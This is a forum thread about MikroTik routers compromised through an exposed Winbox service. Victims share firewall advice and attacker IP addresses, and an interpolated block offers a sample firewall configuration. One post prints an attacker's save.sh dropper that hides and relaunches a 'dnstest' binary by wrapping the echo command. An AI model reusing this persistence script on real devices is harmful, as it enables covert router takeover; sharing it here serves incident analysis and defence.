winbox vulnerable! Unusual login to routers

I noticed today an unusual login to my router exposed to an external IP.
The router had only winbox 8129, ssh on a changed high port and pptp on the default port. Version 6.41.3.
The password is random chars + numbers + special chars and is used nowhere else.

Login to my router:

I updated it to the latest version and downloaded it completely from the outside.

Fortunately, I found two files: save.sh and dnstest.
Maybe their content will help with something:
save.sh
#!/bin/ash
case "$PATH" in
/usr/local/bin)
# old versions
dest="/usr/local/bin/"
;;
*)
dest="/flash/bin/"
if [ ! -d "/flash/" ]; then
exit 1
fi
;;
esac


if [ -f $dest/.dnstest ]; then
rm $dest/.dnstest
fi
if [ -f $dest/echo ]; then
rm $dest/echo
fi
if [ -f $dest/.test ]; then
rm $dest/.test
fi

mkdir -p $dest

export PATH=$PATH:$dest
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest

echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
chmod +x $dest/.test

echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo $*" > $dest/echo
chmod +x $dest/echo
/flash/rw/pckg/dnstest
rm save.sh

dnstest is a binary file, I can send it after contact on PM.


This is not the only case, this is a log from my friend. He had only winbox exposed:

It looks like the first attempt to log in; somewhere here it miraculously collects passwords from the router and later logs in with user perm = full.

IP:
103.1.221.39
marchdom4.com [162.212.182.119]
march10dom5.com [162.212.182.119]

Hi, do you have any firewall setting in your Mikrotik?
You can have a whitelist of IP addresses allowed to access winbox; just changing the port for winbox in the services doesn't mean no one can try to connect to it. You can also have a blacklist for the IPs that fail to log in. If you don't have firewall filter rules, I can send you a default one, a bit tweaked.

Yes, I got a firewall, but the winbox port was exposed to the internet.
The attack came from it.

This looks interesting … scary interesting.

Send everything to support@mikrotik.com. They will probably notice it here, and if it’s real, it will get to them from elsewhere too, but the sooner they get the info, the better.

If true, this is a very serious vulnerability and you should report it directly to Mikrotik support so they can fix it ASAP.

Btw, a basic security precaution is to remove or rename the “admin” user and use a different name entirely. There is nothing special about the “admin” name. In this case, it may not be relevant since they logged in with so few attempts.

Also, in general there should be no public facing remote router administration service. Best is to use a VPN. Next best is to allow login on Winbox or SSH only from specific IPs.

Hello everyone,

The same thing happened to me today.

What’s happening mikrotik team?
Any security problem not notified?
bug or backdoor?

AS131149 103.1.220.0/23 LJ Hosting Co., LTD

IP Address
103.1.221.29

Hostname
103-1-221-29.static.ip.net.tw

Name Servers
a.g-dns.com
b.g-dns.com
c.g-dns.com

Authority
a.g-dns.com
support@twnoc.net
221.1.103.in-addr.arpa

Network
103.1.221.0/24
AS131149
YUANJHEN-AS-TW Yuan-Jhen Info., Co., Ltd, TW

Designation
APNIC

Location
Banqiao, Taiwan
25.0143, 121.4672

Interesting, and by any chance did you use admin as a user or was it changed?

I think the best way is to use a whitelist and netinstall the router.

But before doing that send a supout file to mikrotik.

And the last thing, use a strong ssh key.

I just checked most of my routers, all were ok (6.40.7), but one of them on 6.41.3 was attacked a lot. I had a rule to collect and block them, and no login was established. I believe it is a bug in 6.41.3 in the firewall filter: I had a whitelist for input but it looks like it wasn't working, or somehow other rules below it were giving any IP access to connect, which shouldn't happen.

Just to stop the attackers, create a whitelist address list, for example called Support, and then the raw firewall rule:

/ip firewall raw
add action=drop chain=prerouting dst-port=22,80,8291 log=yes protocol=tcp src-address-list=!Support

I have already notified the mikrotik support, I could not send the support file because the router is blocked.
@normis, mikrotik team can you check this immediately?
this is very serious.

Hello,
I had configured it so that after 3 access attempts the IP is blocked, but they got in on the first attempt with a key of numbers, signs, uppercase and lowercase letters. It is clear that it is a very serious bug that does not require any effort to gain control of the router.

Good catch. Will be interesting to get more details. Unfortunately vulnerabilities are a fact of life these days. For the last ten years I have only allowed trusted IPs access to Winbox & SSH. It's never a good idea to expose unnecessary things to the Internet in the hope that they will be resilient enough to ward off the ever so persistent probes and attacks. And changing port numbers helps to a point. I suppose if you use a good port scan blocker in your firewall you may be lucky and detect them before they find you. It's always better to restrict to specific networks or only allow access from VPN.

Looks like Mikrotik has sold well enough to become a very promising attack target for the bad guys.

I run an average network (public C-network) and I see an average of 215.000 attempted attacks per day.
That's about 2.5 attacks a second. I guess it's a good thing to ramp up security and block SSH, HTTP, FTP and especially WINBOX so attackers have no hint that you are using Mikrotik devices.

Do we even know if mikrotik closed this door with 6.42???

Likely not as it seems to be a new issue. So disable access to Winbox from the internet, and even better restrict it to just a few addresses from the LAN, until it becomes clear.

1. Set a user name and password with a combination of Cyrillic alphabet, after that remove or disable the user admin!
2. Change the port numbers for ssh, winbox etc.
3. Set strong crypto for ssh
4. Set ACL
5. Set 3 login attempts to blacklist and deny attempts with RAW
6. Disable all other unused services
Finally connect the cable to the WAN ethernet port!
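The whitelist and "3 attempts then blacklist" idea from this list, and the raw drop rule suggested a few posts above, as one RouterOS configuration. This is an added example, not something posted in the thread: the address 198.51.100.10, the list names mgmt-whitelist, mgmt-stage1..3 and mgmt-blacklist, and the use of ports 22 and 8291 are assumptions, and the attempt counter counts new TCP connections to those ports rather than failed logins.

```routeros
# Added example (not from the thread). Placeholder management host; replace with your own.
/ip firewall address-list
add list=mgmt-whitelist address=198.51.100.10 comment="placeholder: admin workstation"

/ip firewall filter
# Keep already-established sessions working while the rest of the chain is applied.
add chain=input action=accept connection-state=established,related comment="existing sessions"
# Winbox (8291) and SSH (22) are reachable only from the whitelist; nothing else sees them.
add chain=input action=accept protocol=tcp dst-port=22,8291 src-address-list=mgmt-whitelist \
    comment="Winbox/SSH only from whitelist"
# Staged counter for everyone else: each new connection to 22/8291 moves the source one stage up.
# Rules are ordered from highest stage to lowest so a single packet advances only one stage.
# Fourth new connection inside a minute: source goes on the blacklist for a day.
add chain=input action=add-src-to-address-list address-list=mgmt-blacklist address-list-timeout=1d \
    protocol=tcp dst-port=22,8291 connection-state=new src-address-list=mgmt-stage3 \
    comment="4th attempt: blacklist for 1 day"
add chain=input action=add-src-to-address-list address-list=mgmt-stage3 address-list-timeout=1m \
    protocol=tcp dst-port=22,8291 connection-state=new src-address-list=mgmt-stage2
add chain=input action=add-src-to-address-list address-list=mgmt-stage2 address-list-timeout=1m \
    protocol=tcp dst-port=22,8291 connection-state=new src-address-list=mgmt-stage1
add chain=input action=add-src-to-address-list address-list=mgmt-stage1 address-list-timeout=1m \
    protocol=tcp dst-port=22,8291 connection-state=new
# Whatever is not whitelisted never reaches the Winbox or SSH service.
add chain=input action=drop protocol=tcp dst-port=22,8291 comment="drop Winbox/SSH from everyone else"

/ip firewall raw
# Blacklisted sources are discarded before connection tracking, on every port, and logged.
add chain=prerouting action=drop src-address-list=mgmt-blacklist log=yes log-prefix="mgmt-blacklist" \
    comment="blacklisted sources dropped early"
```

Apply it from a host that is already on mgmt-whitelist (Safe Mode in Winbox helps if a rule locks you out), and check /log for the mgmt-blacklist prefix to see who is being dropped. Note what the thread itself reports: the intruder logged in on the first attempt, so the staged counter on its own would not have stopped it; the whitelist accept followed by the unconditional drop is the control that actually keeps the service off the internet.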

In point 1 you're wrong; just like the password type, I had a password of type "@ _23UbakJav!2947!#6hasd! - +)" and they got in with a single attempt. It is something more serious that lets them see the key; the only way is to close all the ports to the computers on the LAN.

I had the same visit on three different days…

I noticed that it is from the day after the update 6.42 … randomness ???

I have set the due rules… I hope!!!

Can you please upload the 'dnstest' binary? It might provide some clues as to what's going on.

password: mikrotik
mikrotik.7z (34.9 KB)